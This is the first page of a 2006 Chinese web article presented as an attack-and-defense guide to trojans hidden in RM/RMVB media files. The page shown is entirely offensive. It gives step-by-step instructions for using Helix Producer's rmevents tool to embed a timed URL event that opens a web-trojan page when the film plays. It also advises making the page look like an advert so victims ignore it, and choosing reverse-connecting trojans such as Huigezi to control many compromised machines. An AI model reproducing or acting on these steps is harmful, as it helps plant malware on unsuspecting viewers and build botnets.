设计 工具 系统 开发 安全 办公 陶吧 IT教育 Vista频道|Google Chrome SOA案例研究
您现在的位置: 天极网 > 软件频道 > 网络安全频道 > 黑客技术 > 危害性更大 媒体文件木马攻防实战
全文

危害性更大 媒体文件木马攻防实战

2006-02-14 10:38作者:出处:安全中国责任编辑:原野

  如今网络上流传最为广泛的媒体文件有两类,一类是RM、RMVB文件,另一类是WMV、WMA文件,由于它们对流媒体的良好支持,使网络上的电影、音乐等媒体文件几乎都采用了这两种媒体文件格式,因此,如果在媒体文件中植入木马,那么媒体文件中木马独有的隐蔽性将会使受害者在不知不觉中被网页木马侵害,危害性可见一斑。

  RM、RMVB中加入木马

  Helix Producer Plus是一款图形化的专业流媒体文件制作工具,我们可以利用Helix Producer Plus这款软件把其他格式的文件转换成RM或RMVB格式,当然也可以对已存在的RM文件进行重新编辑,在编辑的同时,我们可以把事先准备好的网页木马插入其中。这样只要一打开这个编辑好的媒体文件,插入在其中的网页木马也会随之打开,我们甚至还能控制网页木马打开的时间,让网页木马更隐蔽。

天极软件专题专区精选
Windows Vista专区 POPO专区 QQ专区 QQ挂机 注册表专区 Windows优化
Flash MX 视频教程 Photoshop视频教程 网页设计视频教程 照片处理数字暗房
PPT动画演示教程 Excel动画教程集 Word动画演示教程 Google专区
特洛伊木马专区 黑客知识教程专区 防火墙应用专区 了解Web2.0
Windows API开发专区 网络编程专区 VB数据库编程专区 图像处理与多媒体编程

  步骤1:首先下载Helix Producer Plus,一路“Next”完成安装,然后我们要找一个能把网页木马插入其中的RM电影文件,把它改名为film.rm,然后拷贝到Helix Producer Plus安装目录的RealMediaEditor文件夹下。

  步骤2:我们在这个文件夹中新建一个文本文档,命名为test.txt,在test.txt文件中写入这样一句命令:“u 00:07:00 00:07:30 http://www.***.com/in

  dex.php”,这句命令的意思是当媒体文件播放到第7分钟后触发打开URL事件,然后到7分30秒的时候事件结束,最后面的就是URL的网址,我们可以把这个网址改成我们的网页木马的地址(关于网页木马的制作和设置已经多次介绍,在此不再重复),这样便可以在别人看媒体文件的时候打开网页木马,让他不知不觉中招(如图1)。

  小提示:对于制作的网页木马应尽量隐蔽,并模仿正常网页,否则在看媒体文件时突然弹出网页谁都会有疑心,当然把它做成类似的广告网页效果最好,别人会以为是广告,便一关了之,而这时我们已经种马成功了。对于木马的选择应尽量使用具有反向连接的木马,如灰鸽子,否则即使有了上百的肉鸡,一个一个去连接也是很麻烦的。

  步骤3:运行CMD(命令提示符),进入RealMediaEditor文件夹,输入命令:“rmevents -i film.rm -e test.txt -o film2.rm”,这是最关键的一步,意思是利用Helix Producer Plus自带的rmevents.exe把test.txt这个触发URL事件合并到film.rm中,并另存为film2.rm。这个新生成的film2.rm便是我们需要的带有网页木马的媒体文件(如图2)。

共2页。 1 2 :
相关搜索:
关注此文读者还看过
热门关注
特别推荐
文章排行
本周
本月
最近更新
关于我们|网站律师|天极服务|电子杂志|RSS订阅|加入我们|网站地图
TMG
Copyright (C) 1999-2008 Chinabyte.com, All Rights Reserved 版权所有 天极网络
商务联系、网站内容、合作建议:010-82657868
版权声明 在线提交意见反馈 Powered by 天极内容管理平台CMS4i
经营性网站备案信息 网警备案 中国网站排名
天极传媒:天极网|比特网|IT专家网|IT商网|52PK游戏网|IT分众